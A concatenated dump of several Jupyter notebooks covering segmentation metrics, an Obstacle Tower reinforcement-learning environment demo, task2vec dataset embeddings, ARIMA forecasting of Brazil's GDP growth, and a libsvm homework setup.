"bins = np.linspace(0,3000,21)\n\nplt.figure()\nplt.hist(result._reference.areas, bins, alpha=0.5, label='true')\nplt.hist(result._predicted.areas, bins, alpha=0.5, label='pred', edgecolor='k')\nplt.legend()\nplt.title('Histogram of detected object areas')\nplt.xlabel('Pixels')\nplt.show()",
"_____no_output_____"
]
],
[
[
"## do some batch processing",
"_____no_output_____"
]
],
[
[
"files = []\nfor n in range(10):\n true = os.path.join(p, 'labels_compressed', f'l_{n}.tif')\n pred = os.path.join(p, 'segmented_2019-11-27', f's_{n}.tif')\n files.append((true, pred))",
"_____no_output_____"
],
[
"batch_result = umetrics.batch(files)",
"/Users/arl/Dropbox/Data/TestingData/UNet2D_testing_Scribble/set12/segmented_2019-11-27/s_0.tif\n/Users/arl/Dropbox/Data/TestingData/UNet2D_testing_Scribble/set12/segmented_2019-11-27/s_1.tif\n/Users/arl/Dropbox/Data/TestingData/UNet2D_testing_Scribble/set12/segmented_2019-11-27/s_2.tif\n/Users/arl/Dropbox/Data/TestingData/UNet2D_testing_Scribble/set12/segmented_2019-11-27/s_3.tif\n/Users/arl/Dropbox/Data/TestingData/UNet2D_testing_Scribble/set12/segmented_2019-11-27/s_4.tif\n/Users/arl/Dropbox/Data/TestingData/UNet2D_testing_Scribble/set12/segmented_2019-11-27/s_5.tif\n/Users/arl/Dropbox/Data/TestingData/UNet2D_testing_Scribble/set12/segmented_2019-11-27/s_6.tif\n/Users/arl/Dropbox/Data/TestingData/UNet2D_testing_Scribble/set12/segmented_2019-11-27/s_7.tif\n/Users/arl/Dropbox/Data/TestingData/UNet2D_testing_Scribble/set12/segmented_2019-11-27/s_8.tif\n/Users/arl/Dropbox/Data/TestingData/UNet2D_testing_Scribble/set12/segmented_2019-11-27/s_9.tif\n"
],
[
"print(batch_result)",
"=============================\n Segmentation Metrics (n=10)\n=============================\nn_true_labels: 2350\nn_pred_labels: 2291\nn_true_positives: 2175\nn_false_positives: 86\nn_false_negatives: 96\nIoU: 0.858\nJaccard: 0.923\npixel_identity: 0.983\nlocalization_error: 2.172\n\n"
]
],
[
[
"*NOTE(arl)*: the metrics here are calculated as follows in batch mode:\n+ `n_true_labels` is the sum of all true labels, etc\n+ `IoU` is the mean IoU of all found objects\n+ `Jaccard` is the Jaccard index over all found objects\n+ `localization_error` is the mean error for all found objects\n+ `pixel_identity` is the per image pixel identity",
"_____no_output_____"
]
],
[
[
"plt.figure()\nplt.hist(batch_result.per_object_IoU)\nplt.title('Histogram of per object IoU metric')\nplt.xlabel('IoU')\nplt.show()",
"_____no_output_____"
],
[
"plt.figure()\nplt.hist(batch_result.per_object_localization_error, bins=np.linspace(0,10,50))\nplt.title('Histogram of per object localization error')\nplt.xlabel('Error in Pixels')\nplt.show()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb024aa8a0f00cc59cfc01578cb7faff8d94044f | 11,428 | ipynb | Jupyter Notebook | examples/run.ipynb | Pianochicken/Final-Project-Obstacle-Tower | 2c4401ed3633145ad54af7f9b6e356378f960c9c | [
"Apache-2.0"
] | null | null | null | examples/run.ipynb | Pianochicken/Final-Project-Obstacle-Tower | 2c4401ed3633145ad54af7f9b6e356378f960c9c | [
"Apache-2.0"
] | null | null | null | examples/run.ipynb | Pianochicken/Final-Project-Obstacle-Tower | 2c4401ed3633145ad54af7f9b6e356378f960c9c | [
"Apache-2.0"
] | null | null | null | 25.913832 | 239 | 0.545765 | [
[
[
"# Basic Usage Guide for Obstacle Tower Gym Interface",
"_____no_output_____"
]
],
[
[
"from obstacle_tower_env import ObstacleTowerEnv, ObstacleTowerEvaluation\n%matplotlib inline\nfrom matplotlib import pyplot as plt\nfrom IPython.display import display, clear_output\nimport numpy as np\n\n# import matplotlib.pyplot as plt\n# import matplotlib.animation as animation",
"_____no_output_____"
]
],
[
[
"## Launching the environment\nEnsure that the Obstacle Tower binary has been downloaded (https://github.com/Unity-Technologies/obstacle-tower-env#download-the-environment), and placed in the correct sub-folder. Here we use the `examples/ObstacleTower` sub-folder.",
"_____no_output_____"
]
],
[
[
"# Realtime mode determines whether the environment window will render the scene,\n# as well as whether the environment will run at realtime speed. Set this to `True`\n# to visual the agent behavior as you would in player mode.\n\nenv = ObstacleTowerEnv('./ObstacleTower/obstacletower', retro=False, realtime_mode=True)",
"_____no_output_____"
]
],
[
[
"## Environment information\nWe can also set the random seed used to generate the environment, as well as choose a starting floor.",
"_____no_output_____"
]
],
[
[
"# The environment provided has a MultiDiscrete action space, where the 4 dimensions are:\n\n# 0. Movement (No-Op/Forward/Back)\n# 1. Camera Rotation (No-Op/Counter-Clockwise/Clockwise)\n# 2. Jump (No-Op/Jump)\n# 3. Movement (No-Op/Right/Left)\nprint(env.action_space)\n\n\n# The observation space provided includes a 168x168 image (the camera from the simulation)\n# as well as the number of keys held by the agent (0-5) and the amount of time remaining.\nprint(env.observation_space)",
"_____no_output_____"
]
],
[
[
"## Interacting with the environment",
"_____no_output_____"
]
],
[
[
"import numpy as np\n\nseed = 5 # seed = np.random.randint(100)\nenv.seed(seed) # Seeds can be chosen from range of 0-100.\nenv.floor(0) # Floors can be chosen from range of 0-100.\nobs = env.reset()\n\nplt.imshow(obs[0])",
"_____no_output_____"
],
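  [
   "# Example of stepping with an explicit action (illustrative values, following the\n# dimension descriptions printed above): move forward, rotate the camera\n# counter-clockwise, jump, and apply no lateral movement.\nexample_action = [1, 1, 1, 0]\nobs, reward, done, info = env.step(example_action)\nprint(reward, done)",
   "_____no_output_____"
  ],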
[
"def run_episode(env):\n done = False\n seed = 5\n env.seed(seed)\n env.floor(0)\n obs = env.reset()\n episode_return = 0.0\n action=[1, 0, 0, 0]\n \n while not done:\n obs, reward, done, info = env.step(env.action_space.sample())\n if not done:\n obs, reward, done, info = env.step(action)\n episode_return += reward\n return episode_return",
"_____no_output_____"
],
[
"##### 跑指定步數 ##### \n\naction=[1, 0, 0, 0]\nr = 0\n\n### img ###\nfig = plt.figure()\nims = []\n\n# observation = [camera, key, time, floor]\n# 1 env.step = 50mms\nfor i in range(0, 100):\n obs, reward, done, info = env.step(env.action_space.sample())\n if not done:\n obs, reward, done, info = env.step(action)\n\n # im = plt.imshow(obs[0], animated =False)\n # ims.append([im])\n # clear_output(True)\n plt.show()\n \n r += reward\n if r>0 :\n print(\"Reward: %.2f\" % r)\n \n if done:\n obs = env.reset()\n print(\"Result Reward: %.2f\" % r)\n\n ### test for save video but get error ###\n\n # ims is a list of lists, each row is a list of artists to draw in the\n # current frame; here we are just animating one artist, the image, in\n # each frame\n \n# ani = animation.ArtistAnimation(fig, ims, interval=50, blit=True, repeat = False, repeat_delay=None)\n\n# To save the animation, use e.g.\n# from matplotlib.animation import FFMpegWriter\n# ani.save(\"movie.mp4\")\n# writer = FFMpegWriter(fps=15, metadata=dict(artist='Me'), bitrate=1800)\n# ani.save(\"movie.mp4\", writer=writer)\n# plt.show()\n##########",
"_____no_output_____"
],
[
"env.close()",
"_____no_output_____"
],
[
"##### Run until done ##### \n\nenv = ObstacleTowerEnv('./ObstacleTower/obstacletower', retro=False, realtime_mode=True)\neval_seeds = [1001]\nenv = ObstacleTowerEvaluation(env, eval_seeds)\n\nprint(\"Total Reward: \",run_episode(env))",
"_____no_output_____"
],
[
"env.close()",
"_____no_output_____"
],
[
"##### 程式分隔線 #####",
"_____no_output_____"
],
[
"print(obs)",
"_____no_output_____"
]
],
[
[
"### Setting environment parameters\nWe can also set the random seed used to generate the environment, as well as choose a starting floor.",
"_____no_output_____"
]
],
[
[
"# Seeds can be chosen from range of 0-100.\nenv.seed(5)",
"_____no_output_____"
],
[
"# Floors can be chosen from range of 0-100.\nenv.floor(15)",
"_____no_output_____"
],
[
"# Additional reset parameters can be set using a config dictionary\n# Here we set the agent perspective to first-person mode.\nconfig = {'agent-perspective': 1}",
"_____no_output_____"
],
[
"# These parameters won't take place until the next reset.\nobs = env.reset(config=config)\nplt.imshow(obs[0])",
"_____no_output_____"
]
],
[
[
"## Evaluation",
"_____no_output_____"
]
],
[
[
"from obstacle_tower_env import ObstacleTowerEnv, ObstacleTowerEvaluation\n%matplotlib inline\nfrom matplotlib import pyplot as plt\n\ndef run_episode(env):\n done = False\n episode_return = 0.0\n \n while not done:\n action = env.action_space.sample()\n obs, reward, done, info = env.step(action)\n episode_return += reward\n return episode_return",
"_____no_output_____"
],
[
"if __name__ == '__main__':\n # In this example we use the seeds used for evaluating submissions \n # to the Obstacle Tower Challenge.\n #eval_seeds = [1001, 1002, 1003, 1004, 1005]\n eval_seeds = [1001]\n\n # Create the ObstacleTowerEnv gym and launch ObstacleTower\n env = ObstacleTowerEnv('./ObstacleTower/obstacletower', realtime_mode=False)\n\n # Wrap the environment with the ObstacleTowerEvaluation wrapper\n # and provide evaluation seeds.\n env = ObstacleTowerEvaluation(env, eval_seeds)\n\n # We can run episodes (in this case with a random policy) until \n # the \"evaluation_complete\" flag is True. Attempting to step or reset after\n # all of the evaluation seeds have completed will result in an exception.\n while not env.evaluation_complete:\n episode_rew = run_episode(env)\n\n # Finally the evaluation results can be fetched as a dictionary from the \n # environment wrapper.\n print(env.results)\n",
"_____no_output_____"
],
[
"env.close()",
"_____no_output_____"
]
],
[
[
"## Launching the environment (retro mode)\nWe also provide a `retro mode` which uses observation and action spaces similar to those found in the Arcade Learning Environment (ALE).",
"_____no_output_____"
]
],
[
[
"env = ObstacleTowerEnv('./ObstacleTower/obstacletower', retro=True)",
"_____no_output_____"
],
[
"# In retro mode, the observation is an 84x84 image with the time remaining and key count visually embedded.\nenv.observation_space",
"_____no_output_____"
]
],
[
[
"## Interacting with the environment (retro mode)",
"_____no_output_____"
]
],
[
[
"obs = env.reset()\nprint(obs.shape)",
"_____no_output_____"
],
[
"obs, reward, done, info = env.step(env.action_space.sample())\nplt.imshow(obs)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb0265eb08653ee203b75321c4e4ab369cf28294 | 16,661 | ipynb | Jupyter Notebook | small_datasets_example.ipynb | naymaraq/aws-cv-task2vec | 7cc1088c2604fd9662c24dec60cf5bd42eb9f740 | [
"Apache-2.0"
] | 67 | 2020-07-07T23:45:34.000Z | 2022-03-16T21:11:09.000Z | small_datasets_example.ipynb | naymaraq/aws-cv-task2vec | 7cc1088c2604fd9662c24dec60cf5bd42eb9f740 | [
"Apache-2.0"
] | 5 | 2020-07-22T01:09:39.000Z | 2021-11-19T22:34:04.000Z | small_datasets_example.ipynb | naymaraq/aws-cv-task2vec | 7cc1088c2604fd9662c24dec60cf5bd42eb9f740 | [
"Apache-2.0"
] | 16 | 2020-07-14T14:34:20.000Z | 2022-03-21T01:08:35.000Z | 179.150538 | 14,596 | 0.915491 | [
[
[
"from task2vec import Task2Vec\nfrom models import get_model\nimport datasets\nimport task_similarity",
"_____no_output_____"
],
[
"dataset_names = ('stl10', 'mnist', 'cifar10', 'cifar100', 'letters', 'kmnist')\n# Change `root` with the directory you want to use to download the datasets\ndataset_list = [datasets.__dict__[name](root='./data')[0] for name in dataset_names] ",
"_____no_output_____"
],
[
"embeddings = []\nfor name, dataset in zip(dataset_names, dataset_list):\n print(f\"Embedding {name}\")\n probe_network = get_model('resnet34', pretrained=True, num_classes=int(max(dataset.targets)+1)).cuda()\n embeddings.append( Task2Vec(probe_network, max_samples=1000, skip_layers=6).embed(dataset) )",
"_____no_output_____"
],
[
"task_similarity.plot_distance_matrix(embeddings, dataset_names)",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code"
]
] |
cb026b2f6017681dd6b0b3974538c7cd99cbe43d | 664,884 | ipynb | Jupyter Notebook | Development Indicators Project/python notebooks/BR_GDP-growth.ipynb | autodidact-m/Projects | f4c0473adba42f3a629b62eb09d3b1df91982f46 | [
"Apache-2.0"
] | null | null | null | Development Indicators Project/python notebooks/BR_GDP-growth.ipynb | autodidact-m/Projects | f4c0473adba42f3a629b62eb09d3b1df91982f46 | [
"Apache-2.0"
] | null | null | null | Development Indicators Project/python notebooks/BR_GDP-growth.ipynb | autodidact-m/Projects | f4c0473adba42f3a629b62eb09d3b1df91982f46 | [
"Apache-2.0"
] | null | null | null | 462.688935 | 56,178 | 0.921532 | [
[
[
"import json\nimport requests\nimport csv\nimport pandas as pd\nimport os\nimport matplotlib.pylab as plt\nimport numpy as np\n%matplotlib inline\npd.options.mode.chained_assignment = None\nfrom statsmodels.tsa.arima_model import ARIMA\nimport statsmodels.api as sm\nimport operator\nfrom statsmodels.tsa.stattools import acf \nfrom statsmodels.tsa.stattools import pacf\nfrom pandas.tools.plotting import autocorrelation_plot",
"_____no_output_____"
],
[
"dateparse = lambda dates: pd.datetime.strptime(dates, '%Y-%m-%d')\nindicator_data = pd.read_csv('P:\\\\ADS\\\\Final\\\\Indicators_Cleaned.csv',header=0,parse_dates=True,index_col='Year',date_parser=dateparse, low_memory=False) \nindicator_data.head()",
"_____no_output_____"
],
[
"indicator_data.reset_index()\nindicator_data.head()",
"_____no_output_____"
],
[
"brazil_df_ind6 = indicator_data[(indicator_data['IndicatorCode'].isin(['NY.GDP.MKTP.KD.ZG'])) &\\\n (indicator_data['CountryCode'] == 'BR')]",
"_____no_output_____"
],
[
"brazil_df_ind6.index",
"_____no_output_____"
],
[
"ts = brazil_df_ind6['Value'] \nts1 = brazil_df_ind6[['Value']].copy() \nts1['Value']=ts1['Value']+20\nts1.head()",
"_____no_output_____"
],
[
"plt.plot(ts1)",
"_____no_output_____"
],
[
"from statsmodels.tsa.stattools import adfuller\ndef test_stationarity(timeseries):\n \n #Determing rolling statistics\n rolmean = pd.rolling_mean(timeseries, window=12)\n rolstd = pd.rolling_std(timeseries, window=12)\n\n #Plot rolling statistics:\n orig = plt.plot(timeseries, color='blue',label='Original')\n mean = plt.plot(rolmean, color='red', label='Rolling Mean')\n std = plt.plot(rolstd, color='black', label = 'Rolling Std')\n plt.legend(loc='best')\n plt.title('Rolling Mean & Standard Deviation')\n plt.show(block=False)\n \n #Perform Dickey-Fuller test:\n print ('Results of Dickey-Fuller Test:')\n dftest = adfuller(timeseries, autolag='AIC')\n dfoutput = pd.Series(dftest[0:4], index=['Test Statistic','p-value','#Lags Used','Number of Observations Used'])\n for key,value in dftest[4].items():\n dfoutput['Critical Value (%s)'%key] = value\n print (dfoutput)\ntest_stationarity(ts1.Value)",
"C:\\Users\\priya\\Anaconda3\\lib\\site-packages\\ipykernel\\__main__.py:5: FutureWarning: pd.rolling_mean is deprecated for Series and will be removed in a future version, replace with \n\tSeries.rolling(center=False,window=12).mean()\nC:\\Users\\priya\\Anaconda3\\lib\\site-packages\\ipykernel\\__main__.py:6: FutureWarning: pd.rolling_std is deprecated for Series and will be removed in a future version, replace with \n\tSeries.rolling(center=False,window=12).std()\n"
],
[
"decomposition = sm.tsa.seasonal_decompose(ts1, model='additive')\nfig = decomposition.plot()\nplt.show()",
"_____no_output_____"
]
],
[
[
"## Taking Log",
"_____no_output_____"
]
],
[
[
"def logTransform(df):\n ts_log = np.log(df)\n plt.plot(ts_log)\n return ts_log",
"_____no_output_____"
],
[
"ts1_log = logTransform(ts1)",
"_____no_output_____"
],
[
"test_stationarity(ts1_log.Value)",
"C:\\Users\\priya\\Anaconda3\\lib\\site-packages\\ipykernel\\__main__.py:5: FutureWarning: pd.rolling_mean is deprecated for Series and will be removed in a future version, replace with \n\tSeries.rolling(center=False,window=12).mean()\nC:\\Users\\priya\\Anaconda3\\lib\\site-packages\\ipykernel\\__main__.py:6: FutureWarning: pd.rolling_std is deprecated for Series and will be removed in a future version, replace with \n\tSeries.rolling(center=False,window=12).std()\n"
]
],
[
[
"## Log first difference ",
"_____no_output_____"
]
],
[
[
"def logFirstDifference(ts1_log):\n ts1_log_diff = ts1_log - ts1_log.shift()\n ts1_log_diff.dropna(inplace=True)\n return ts1_log_diff",
"_____no_output_____"
],
[
"ts1_log_diff = logFirstDifference(ts1_log)\ntest_stationarity(ts1_log_diff.Value)",
"C:\\Users\\priya\\Anaconda3\\lib\\site-packages\\ipykernel\\__main__.py:5: FutureWarning: pd.rolling_mean is deprecated for Series and will be removed in a future version, replace with \n\tSeries.rolling(center=False,window=12).mean()\nC:\\Users\\priya\\Anaconda3\\lib\\site-packages\\ipykernel\\__main__.py:6: FutureWarning: pd.rolling_std is deprecated for Series and will be removed in a future version, replace with \n\tSeries.rolling(center=False,window=12).std()\n"
]
],
[
[
"## First difference ",
"_____no_output_____"
]
],
[
[
"def firstDifference(df):\n #ts_first_diff = df - df.shift()\n #ts_first_diff.dropna(inplace=True)\n ts_first_diff = df.diff()\n ts_first_diff.dropna(inplace=True)\n return ts_first_diff\n\n",
"_____no_output_____"
],
[
"ts1_first_diff = firstDifference(ts1)\ntest_stationarity(ts1_first_diff.Value)",
"C:\\Users\\priya\\Anaconda3\\lib\\site-packages\\ipykernel\\__main__.py:5: FutureWarning: pd.rolling_mean is deprecated for Series and will be removed in a future version, replace with \n\tSeries.rolling(center=False,window=12).mean()\nC:\\Users\\priya\\Anaconda3\\lib\\site-packages\\ipykernel\\__main__.py:6: FutureWarning: pd.rolling_std is deprecated for Series and will be removed in a future version, replace with \n\tSeries.rolling(center=False,window=12).std()\n"
],
[
"def expWeightedavg(ts1_log):\n expwighted_avg = pd.ewma(ts1_log, halflife=57)\n ts_log_ewma_diff = ts1_log - expwighted_avg\n ts1_log_diff.dropna(inplace=True)\n return ts1_log_diff",
"_____no_output_____"
],
[
"ts_log_ewma_diff = expWeightedavg(ts1_log)\ntest_stationarity(ts_log_ewma_diff.Value)",
"C:\\Users\\priya\\Anaconda3\\lib\\site-packages\\ipykernel\\__main__.py:2: FutureWarning: pd.ewm_mean is deprecated for DataFrame and will be removed in a future version, replace with \n\tDataFrame.ewm(adjust=True,ignore_na=False,min_periods=0,halflife=57).mean()\n from ipykernel import kernelapp as app\nC:\\Users\\priya\\Anaconda3\\lib\\site-packages\\ipykernel\\__main__.py:5: FutureWarning: pd.rolling_mean is deprecated for Series and will be removed in a future version, replace with \n\tSeries.rolling(center=False,window=12).mean()\nC:\\Users\\priya\\Anaconda3\\lib\\site-packages\\ipykernel\\__main__.py:6: FutureWarning: pd.rolling_std is deprecated for Series and will be removed in a future version, replace with \n\tSeries.rolling(center=False,window=12).std()\n"
],
[
"from statsmodels.tsa.seasonal import seasonal_decompose\n\ndecomposition = seasonal_decompose(ts1_log)\n\ntrend = decomposition.trend\nseasonal = decomposition.seasonal\nresidual = decomposition.resid\n\nplt.subplot(411)\nplt.plot(ts1_log, label='Original')\nplt.legend(loc='best')\nplt.subplot(412)\nplt.plot(trend, label='Trend')\nplt.legend(loc='best')\nplt.subplot(413)\nplt.plot(seasonal,label='Seasonality')\nplt.legend(loc='best')\nplt.subplot(414)\nplt.plot(residual, label='Residuals')\nplt.legend(loc='best')\nplt.tight_layout()",
"_____no_output_____"
],
[
"lag_acf = acf(ts1_log, nlags=10)\nlag_pacf = pacf(ts1_log, nlags=10, method='ols')",
"_____no_output_____"
],
[
"fig = plt.figure(figsize=(12,8))\nax1 = fig.add_subplot(211)\nfig = sm.graphics.tsa.plot_acf(ts1_log, lags=10, ax=ax1)\nax2 = fig.add_subplot(212)\nfig = sm.graphics.tsa.plot_pacf(ts1_log, lags=10, ax=ax2)",
"_____no_output_____"
]
],
[
[
"- As seen from the graph above both ACF and PACF are geometric hence this is an ARMA model",
"_____no_output_____"
]
],
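To back up this reading of the correlograms, one option is a small AIC grid search over low ARMA orders. The sketch below is not part of the original analysis; it assumes `ts1_log` from the cells above, uses the same (now-deprecated) `statsmodels` ARIMA API that the rest of the notebook uses, and the `0..3` order ranges are an illustrative choice.

```python
import numpy as np
from statsmodels.tsa.arima_model import ARIMA


def grid_search_arma(series, max_p=3, max_q=3):
    """Return (best_aic, best_order) over ARMA(p, q) fits with p <= max_p, q <= max_q."""
    best_aic, best_order = np.inf, None
    for p in range(max_p + 1):
        for q in range(max_q + 1):
            try:
                fit = ARIMA(series, order=(p, 0, q)).fit(disp=0)
            except Exception:
                continue  # some orders fail to converge; just skip them
            if fit.aic < best_aic:
                best_aic, best_order = fit.aic, (p, 0, q)
    return best_aic, best_order


# best_aic, best_order = grid_search_arma(ts1_log)
```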
[
[
"autocorrelation_plot(ts1_log)\nplt.show()",
"_____no_output_____"
],
[
"plt.subplot(122)\nplt.plot(lag_pacf)\nplt.axhline(y=0,linestyle='--',color='gray')\nplt.axhline(y=-1.96/np.sqrt(len(ts1_log)),linestyle='--',color='gray')\nplt.axhline(y=1.96/np.sqrt(len(ts1_log)),linestyle='--',color='gray')\nplt.title('Partial Autocorrelation Function')\nplt.tight_layout()",
"_____no_output_____"
],
[
"aic_metric = pd.DataFrame({'Modelname':[],'AIC':[]})\naic_dict = {}",
"_____no_output_____"
],
[
"def cal_aic_metric(modelname,model):\n global aic_metric\n AIC = model.aic\n aic_dict[modelname] = AIC\n df_error = pd.DataFrame({'Modelname':[modelname],'AIC':[AIC]})\n aic_metric = pd.concat([aic_metric,df_error])\n return aic_metric",
"_____no_output_____"
],
[
"def AR_Model(ts):\n model = ARIMA(ts, order=(2, 0, 0))\n results_AR = model.fit(disp=0)\n cal_aic_metric('ARIMA(ts, order=(2, 0, 0))',results_AR)\n print('Lag: %s' % results_AR.k_ar)\n print('Coefficients: %s' % results_AR.params)\n #print(results_AR.summary())\n predict_MA_HPI = np.exp(results_AR.predict(10, 10, dynamic=True))\n print(predict_MA_HPI)\n plt.plot(ts1_log)\n plt.plot(results_AR.fittedvalues, color='red')\n #print(np.exp(results_AR.fittedvalues))\n print(results_AR.aic)\n return results_AR",
"_____no_output_____"
],
[
"model_AR = AR_Model(ts1_log)",
"Lag: 2\nCoefficients: const 3.166285\nar.L1.Value 0.434568\nar.L2.Value 0.199589\ndtype: float64\n2006-01-01 24.993051\nFreq: -1AS-JAN, dtype: float64\n-45.272005733939636\n"
],
[
"def MA_Model(ts):\n model = ARIMA(ts, order=(0,0, 5))\n results_MA = model.fit(disp=0)\n cal_aic_metric('ARIMA(ts, order=(0, 0, 5))',results_MA)\n print('Lag: %s' % results_MA.k_ar)\n print('Coefficients: %s' % results_MA.params)\n print(results_MA.summary())\n plt.plot(ts)\n plt.plot(results_MA.fittedvalues, color='red')\n return results_MA",
"_____no_output_____"
],
[
"model_MA = MA_Model(ts1_log)",
"Lag: 0\nCoefficients: const 3.169758\nma.L1.Value 0.470765\nma.L2.Value 0.478736\nma.L3.Value 0.241620\nma.L4.Value 0.161593\nma.L5.Value -0.164789\ndtype: float64\n ARMA Model Results \n==============================================================================\nDep. Variable: Value No. Observations: 57\nModel: ARMA(0, 5) Log Likelihood 28.336\nMethod: css-mle S.D. of innovations 0.146\nDate: Wed, 16 Aug 2017 AIC -42.672\nTime: 19:39:15 BIC -28.371\nSample: 01-01-2016 HQIC -37.114\n - 01-01-1960 \n===============================================================================\n coef std err z P>|z| [95.0% Conf. Int.]\n-------------------------------------------------------------------------------\nconst 3.1698 0.042 76.034 0.000 3.088 3.251\nma.L1.Value 0.4708 0.131 3.607 0.001 0.215 0.727\nma.L2.Value 0.4787 0.147 3.251 0.002 0.190 0.767\nma.L3.Value 0.2416 0.155 1.557 0.126 -0.063 0.546\nma.L4.Value 0.1616 0.140 1.158 0.252 -0.112 0.435\nma.L5.Value -0.1648 0.137 -1.206 0.233 -0.433 0.103\n Roots \n=============================================================================\n Real Imaginary Modulus Frequency\n-----------------------------------------------------------------------------\nMA.1 -0.9965 -0.7926j 1.2733 -0.3931\nMA.2 -0.9965 +0.7926j 1.2733 0.3931\nMA.3 0.2675 -1.2096j 1.2389 -0.2154\nMA.4 0.2675 +1.2096j 1.2389 0.2154\nMA.5 2.4388 -0.0000j 2.4388 -0.0000\n-----------------------------------------------------------------------------\n"
],
[
"def Combined_Model(ts):\n model = ARIMA(ts, order=(2, 0, 2)) \n results_ARIMA = model.fit(disp=0)\n cal_aic_metric('ARIMA(ts, order=(1,0, 5))',results_ARIMA)\n print('Lag: %s' % results_ARIMA.k_ar)\n print('Coefficients: %s' % results_ARIMA.params)\n print(results_ARIMA.summary())\n plt.plot(ts)\n plt.plot(results_ARIMA.fittedvalues, color='red')\n return results_ARIMA",
"_____no_output_____"
],
[
"model_Combined = Combined_Model(ts1_log)",
"Lag: 2\nCoefficients: const 3.169695\nar.L1.Value 0.863542\nar.L2.Value -0.351457\nma.L1.Value -0.428471\nma.L2.Value 0.449811\ndtype: float64\n ARMA Model Results \n==============================================================================\nDep. Variable: Value No. Observations: 57\nModel: ARMA(2, 2) Log Likelihood 27.116\nMethod: css-mle S.D. of innovations 0.150\nDate: Wed, 16 Aug 2017 AIC -42.232\nTime: 19:38:00 BIC -29.974\nSample: 01-01-2016 HQIC -37.468\n - 01-01-1960 \n===============================================================================\n coef std err z P>|z| [95.0% Conf. Int.]\n-------------------------------------------------------------------------------\nconst 3.1697 0.041 77.351 0.000 3.089 3.250\nar.L1.Value 0.8635 0.359 2.403 0.020 0.159 1.568\nar.L2.Value -0.3515 0.371 -0.947 0.348 -1.079 0.376\nma.L1.Value -0.4285 0.349 -1.227 0.225 -1.113 0.256\nma.L2.Value 0.4498 0.306 1.470 0.148 -0.150 1.050\n Roots \n=============================================================================\n Real Imaginary Modulus Frequency\n-----------------------------------------------------------------------------\nAR.1 1.2285 -1.1559j 1.6868 -0.1202\nAR.2 1.2285 +1.1559j 1.6868 0.1202\nMA.1 0.4763 -1.4129j 1.4910 -0.1983\nMA.2 0.4763 +1.4129j 1.4910 0.1983\n-----------------------------------------------------------------------------\n"
],
[
"best_model = min(aic_dict.items(),key=operator.itemgetter(1))[0]\nprint('Best Model is ', best_model)",
"Best Model is ARIMA(ts, order=(2, 0, 0))\n"
],
[
"aic_metric",
"_____no_output_____"
],
[
"#Forecast using Best Model\ndef forecast(model,numSteps):\n #model.forecast(steps=numSteps)\n output = model.forecast(steps=numSteps)[0]\n #output.tolist()\n output = np.exp(output)\n output = output-20\n #out=normal(output)\n return output",
"_____no_output_____"
],
[
"forecast(model_AR,15)",
"_____no_output_____"
],
[
"def FittedValues(model):\n fittedVal=model.fittedvalues\n #PredictedVal=normal(fittedVal)\n #PredictedVal= fittedVal.tolist()\n fittedVal = np.exp(fittedVal)\n fittedVal = fittedVal-20\n print('Predicted existing values are:')\n return fittedVal\nFittedValues(model_AR)",
"Predicted existing values are:\n"
],
[
"def normal(predictions_ARIMA_diff):\n #predictions_ARIMA_diff = pd.Series(results_ARIMA.fittedvalues, copy=True)\n predictions_ARIMA_diff_cumsum = np.cumsum(np.concatenate((ts1.values[0], predictions_ARIMA_diff)))\n print('normalized')\n #predictions_ARIMA_diff_cumsum=np.absolute(predictions_ARIMA_diff_cumsum)\n return predictions_ARIMA_diff_cumsum",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb027434996781e209b49a41564500d112ed045c | 268,942 | ipynb | Jupyter Notebook | yk2516_hw2_q3.ipynb | YilunKuang/FML_HW2 | 52b04670bdfe4830a3544ca11f2cb2faaf4021ff | [
"BSD-3-Clause"
] | null | null | null | yk2516_hw2_q3.ipynb | YilunKuang/FML_HW2 | 52b04670bdfe4830a3544ca11f2cb2faaf4021ff | [
"BSD-3-Clause"
] | null | null | null | yk2516_hw2_q3.ipynb | YilunKuang/FML_HW2 | 52b04670bdfe4830a3544ca11f2cb2faaf4021ff | [
"BSD-3-Clause"
] | null | null | null | 200.553318 | 23,976 | 0.890575 | [
[
[
"# Question C | SVMs hand-on\nYilun Kuang (Mark)\n\nN15511943\n\nFML HW 2\n\n",
"_____no_output_____"
],
[
"## Question 1",
"_____no_output_____"
],
[
"```shell\n# Login to the computing cluster\nssh [email protected]\ncd /scratch/yk2516/svm\n\n# Download libsvm github repo\ngit clone https://github.com/cjlin1/libsvm.git\ncd libsvm\nmake\n\n# Install the libsvm pypi packages on the system\nsingularity exec --nv --overlay /scratch/yk2516/singularity/overlay-25GB-500K-0.ext3:rw /scratch/work/public/singularity/cuda11.3.0-cudnn8-devel-ubuntu20.04.sif /bin/bash -c \"\npip install -U libsvm-official\n\n\"\n\n```",
"_____no_output_____"
],
[
"## Question 2",
"_____no_output_____"
],
[
"```shell\n# Download the abalone dataset that is already scaled\nwget https://www.csie.ntu.edu.tw/~cjlin/libsvmtools/datasets/regression/abalone_scale\n\n# Alternatively, get the raw data from the link below and do the preprocessing\nwget http://archive.ics.uci.edu/ml/machine-learning-databases/abalone/abalone.data\n```",
"_____no_output_____"
]
